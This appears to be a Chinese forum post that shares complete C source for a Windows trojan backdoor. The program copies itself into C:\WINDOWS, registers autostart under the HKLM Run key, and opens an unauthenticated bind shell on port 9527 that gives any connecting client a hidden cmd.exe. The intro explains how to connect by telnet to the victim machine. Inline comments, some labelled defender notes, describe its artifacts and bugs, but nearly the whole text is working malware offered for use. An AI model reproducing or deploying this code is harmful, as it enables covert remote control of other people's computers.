一个简单木马后门的程序
以下代码可以在VC++编译下实现,是用C语言写的木马后门程序,本程序是运行在服务器端的(即肉鸡),运行成功后,可以在我们控制端打开cmd.exe输入命令:telnet xx.xx.xx.xx(对方IP) 9527(9527是我自己定义的端口号,你可以在下面的代码中改个你想要对方开启的端口)
进行连接,连接成功后就可以进入服务器端的命令行进行操作。
代码部分:
#include "stdafx.h"
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
// C RunTime Header Files
#include <stdlib.h>
#include <malloc.h>
#include <memory.h>
#include <tchar.h>
//OpenRegedit()和CopySystem()的作用是让服务器端开机自启动本程序
// Persistence step: writes an autostart entry under the HKLM Run key that
// points at C:\WINDOWS\SystemEx.exe (the copy CopySystem() creates).
// Defender note: the value name "system" with that path under
// HKLM\Software\Microsoft\Windows\CurrentVersion\Run is the registry
// artifact this program leaves behind.
// Returns 0 on every path, success and failure alike, so the caller
// cannot tell whether the value was written.
int OpenRegedit() // Opens the Run key and writes the autostart value
{
HKEY hKey;
TCHAR str1[100] = "system"; // value name; the narrow literal means this is an ANSI (TCHAR == char) build
TCHAR str2[100] = "C:\\WINDOWS\\SystemEx.exe"; // value data: the on-disk copy made by CopySystem()
TCHAR str[150]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
// NOTE(review): writing under HKLM is presumably only possible when the
// process runs with elevated rights; otherwise this open fails and no
// persistence is established.
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE , str , 0 , KEY_CREATE_SUB_KEY | KEY_SET_VALUE , &hKey)!=ERROR_SUCCESS)
{
return 0;
}
// cbData is 150 but str2 is only 100 bytes, so the call reads 50 bytes
// past the end of str2 and stores whatever follows it on the stack after
// the terminating NUL.
if(RegSetValueEx(hKey,str1,0,REG_SZ,(BYTE*)str2,150)!=ERROR_SUCCESS)
{
return 0;
}
// Closes the predefined root handle rather than hKey; the handle obtained
// above is never released.
RegCloseKey(HKEY_LOCAL_MACHINE);
return 0;
}
// Copies the running executable to C:\WINDOWS\SystemEx.exe, the same path
// OpenRegedit() registers for autostart.
// Defender note: that file is the on-disk artifact of this program; its
// parent is whatever location the original was launched from.
// Returns 0 on every path (both failures and success).
int CopySystem() // Copies itself into C:\WINDOWS\
{
TCHAR Module[256];
TCHAR str[100]="C:\\WINDOWS\\SystemEx.exe";
if(GetModuleFileName(NULL,Module,256)==0) // NULL module handle = full path of this executable
{
return 0;
}
if(FALSE==CopyFile(Module,str,TRUE)) // bFailIfExists = TRUE: an existing copy is never overwritten
{
return 0;
}
return 0;
}
// Per-thread parameter bundle: the connected socket plus one pipe handle
// (stdin write end for the input thread, stdout read end for the output
// thread). Instances are copied by value in the thread procedures.
class CThreadNode { // Parameter block passed to the two relay threads
public:
SOCKET m_Sock; // accepted client socket, shared by both threads
HANDLE hPipe; // pipe end this thread reads from or writes to
CThreadNode() {
m_Sock = INVALID_SOCKET;
hPipe = NULL;
}
};
// Initialises Winsock 2.2.
// Returns TRUE on success, FALSE if WSAStartup fails. There is no matching
// WSACleanup anywhere in the visible code.
BOOL SocketInit() // Winsock initialisation
{
WSADATA wsaData = {0};
if ( WSAStartup(MAKEWORD(2, 2), &wsaData) == NO_ERROR ) {
return TRUE;
}else{
return FALSE;
}
}
// Sends dwBufLen bytes from pBuf, looping over partial sends.
// Returns -1 for an invalid socket, null buffer or zero length; otherwise
// the number of bytes actually sent. A send() failure part way through
// just ends the loop, so a short count (possibly 0) is returned with no
// separate error indication.
int SendData(SOCKET m_Sock, void *pBuf, DWORD dwBufLen) // Loops until the whole buffer is sent
{
if ( m_Sock == INVALID_SOCKET || !pBuf || dwBufLen <= 0 ) { // dwBufLen is unsigned, so "<= 0" only catches 0
return -1;
}
int iCurrSend = 0, offset = 0;
do {
// dwBufLen is reduced after each partial send, so it is always the
// remaining count and offset the position already sent.
iCurrSend = send(m_Sock, (char *)pBuf+offset, dwBufLen, 0);// keeps sending the remainder
if ( iCurrSend <= 0 ) {
break; // 0 = connection closed, SOCKET_ERROR = failure
}
dwBufLen -= iCurrSend;
offset += iCurrSend;
} while ( dwBufLen > 0 );
return offset;
}
// Stop flag: set by ThreadInputProc when the client connection drops, read
// by ThreadOutputProc's loop. Plain BOOL with no atomic or volatile
// qualifier, shared across two threads.
BOOL bExit = FALSE;
#define RECV_BUF_LEN 4096 // size of the pipe read buffer in ThreadOutputProc
char szCmdBuf[MAX_PATH] = {0}; // not referenced anywhere in the visible code
// Network -> shell direction. Copies whatever the connected peer sends into
// the write end of the shell's stdin pipe, unmodified: there is no
// authentication, filtering or framing anywhere in this path. Runs until
// recv() reports close or error, then sends "exit" to the shell and raises
// the shared bExit flag so the output thread stops too.
// lpParam points to a CThreadNode, copied by value below.
DWORD WINAPI ThreadInputProc(LPVOID lpParam)// Receives controller input and feeds it to cmd.exe
{
CThreadNode tNode = *(CThreadNode *)lpParam;
DWORD dwWrited = 0, dwRecvd = 0;
char szBuf[MAX_PATH] = {0};
BOOL bRet = FALSE; // unused
while ( TRUE ) {
// recv() returns int but is stored in a DWORD; SOCKET_ERROR (-1) becomes
// 0xFFFFFFFF, which passes "> 0" and is caught by the second test.
dwRecvd = recv(tNode.m_Sock, szBuf, MAX_PATH, 0);
if ( dwRecvd > 0 && dwRecvd != SOCKET_ERROR ) {
WriteFile(tNode.hPipe, szBuf, dwRecvd, &dwWrited, NULL); // return value is not checked
}else{
closesocket(tNode.m_Sock);
// sizeof includes the terminating NUL, so 7 bytes are written.
WriteFile(tNode.hPipe, "exit\r\n", sizeof("exit\r\n"), &dwWrited, NULL);
bExit = TRUE; // tells ThreadOutputProc to leave its loop
break;
}
Sleep(50);
}
return TRUE;
}
// Shell -> network direction. Polls the read end of the shell's stdout/stderr
// pipe and relays anything available to the connected peer via SendData().
// Loops until bExit is set by ThreadInputProc.
// Note the Sleep() is inside the "data available" branch only: while the
// pipe is empty this loop spins without pausing.
// lpParam points to a CThreadNode, copied by value below.
DWORD WINAPI ThreadOutputProc(LPVOID lpParam) // Relays cmd.exe output to the client
{
CThreadNode tNode = *(CThreadNode *)lpParam;
char szBuf[RECV_BUF_LEN] = {0};
DWORD dwReadLen = 0, dwTotalAvail = 0;
BOOL bRet = FALSE;
while ( !bExit ) {
dwTotalAvail = 0;
// Non-blocking check so ReadFile below is only called when it will not block.
bRet = PeekNamedPipe(tNode.hPipe, NULL, 0, NULL, &dwTotalAvail, NULL);
if ( bRet && dwTotalAvail > 0 ) {
bRet = ReadFile(tNode.hPipe, szBuf, RECV_BUF_LEN, &dwReadLen, NULL);
if ( bRet && dwReadLen > 0 ) {
SendData(tNode.m_Sock, szBuf, dwReadLen); // return value (bytes sent) is ignored
}
Sleep(50);
}
}
return TRUE;
}
// Bind shell: listens on every local interface at uPort, accepts the first
// TCP connection with no address check or authentication, and hands that
// peer a hidden cmd.exe whose stdin/stdout/stderr are wired to the socket
// through two anonymous pipes and two relay threads.
// Defender notes grounded in this code: a listening TCP port on the host,
// a cmd.exe child with SW_HIDE and redirected standard handles, and this
// process as its parent are the observable artifacts of a live session.
// Returns FALSE on any setup failure, TRUE after the session ends. The
// early returns do not close m_ListenSock, m_AcceptSock or the pipe
// handles, and the listening socket is never closed on the success path.
BOOL StartShell(UINT uPort)
{
if ( !SocketInit() ) { // initialise Winsock
return FALSE;
}
SOCKET m_ListenSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if ( m_ListenSock == INVALID_SOCKET ) {
return FALSE;
}
sockaddr_in sServer = {0};
sServer.sin_family = AF_INET;
sServer.sin_addr.s_addr = htonl(INADDR_ANY);// bind to every local address
sServer.sin_port = htons(uPort); // the port to expose
if ( bind(m_ListenSock, (sockaddr *)&sServer, sizeof(sServer)) == SOCKET_ERROR ) { // bind socket to address and port
return FALSE;
}
if ( listen(m_ListenSock, 5) == SOCKET_ERROR ) { // put the socket into listening mode
return FALSE;
}
// Blocks until one peer connects; the peer address is not recorded or
// checked, and accept() failure (INVALID_SOCKET) is not tested.
SOCKET m_AcceptSock = accept(m_ListenSock, NULL, NULL); // wait for a single client connection
// Pipe and process setup
CThreadNode m_ReadNode, m_WriteNode;
STARTUPINFO si = {0};
si.cb = sizeof(STARTUPINFO);
PROCESS_INFORMATION pi = {0};
DWORD dwThreadRead = 0, dwThreadWrite = 0;
HANDLE hReadPipe1 = NULL, hWritePipe1 = NULL; // Input the command;
HANDLE hReadPipe2 = NULL, hWritePipe2 = NULL; // Get the command results;
HANDLE hThreadOutput = NULL, hThreadInput = NULL;
SECURITY_ATTRIBUTES sa = {0};
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE; // both ends of both pipes become inheritable by the child
// Two anonymous pipes: pipe 1 carries input to cmd, pipe 2 carries cmd's output back
if ( !CreatePipe(&hReadPipe1, &hWritePipe1, &sa, 0) || !CreatePipe(&hReadPipe2, &hWritePipe2, &sa, 0) ) {
return FALSE;
}
m_ReadNode.m_Sock = m_WriteNode.m_Sock = m_AcceptSock;
GetStartupInfo(&si); // start from this process's own startup info
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.hStdInput = hReadPipe1; // cmd reads its stdin from pipe 1; data arrives via hWritePipe1
si.hStdOutput = si.hStdError = hWritePipe2;// cmd's stdout and stderr go into pipe 2
si.wShowWindow = SW_HIDE; // no visible console window
TCHAR szCmdLine[MAX_PATH] = {0};
GetSystemDirectory(szCmdLine, MAX_PATH); // system directory, e.g. ...\system32
strcat(szCmdLine,TEXT("\\cmd.exe")); // unbounded strcat; MAX_PATH is assumed to leave room
// bInheritHandles = TRUE so the pipe handles above are valid in the child.
if ( !CreateProcess(szCmdLine, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi) ) { // launch cmd.exe with si as its startup info
return FALSE;
}
// Output thread reads cmd's output from pipe 2
m_ReadNode.hPipe = hReadPipe2;
hThreadOutput = CreateThread(NULL, 0, ThreadOutputProc, &m_ReadNode, 0, &dwThreadWrite);
// Input thread writes client data into pipe 1
m_WriteNode.hPipe = hWritePipe1;
hThreadInput = CreateThread(NULL, 0, ThreadInputProc, &m_WriteNode, 0, &dwThreadRead);
HANDLE szHandles[] = { hThreadOutput, hThreadInput }; // the two relay thread handles
WaitForMultipleObjects(2, szHandles, TRUE, INFINITE); // bWaitAll = TRUE: return only when both threads have exited, no timeout
return TRUE;
}
// GUI-subsystem entry point (no console is created for this process).
// Order of operations: register the Run-key persistence, copy itself to
// C:\WINDOWS\SystemEx.exe, then block in StartShell() on port 9527 until
// the single shell session ends. All three return values are ignored, so
// failure of the persistence steps does not stop the listener.
int APIENTRY WinMain(HINSTANCE hInstance, // entry point
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
OpenRegedit(); // registry autostart entry
CopySystem(); // on-disk copy
StartShell(9527); // listening port hard-coded here
return 0;
}
分享快乐哈!本人还是菜鸟中的菜鸟,希望大家以后多多支持!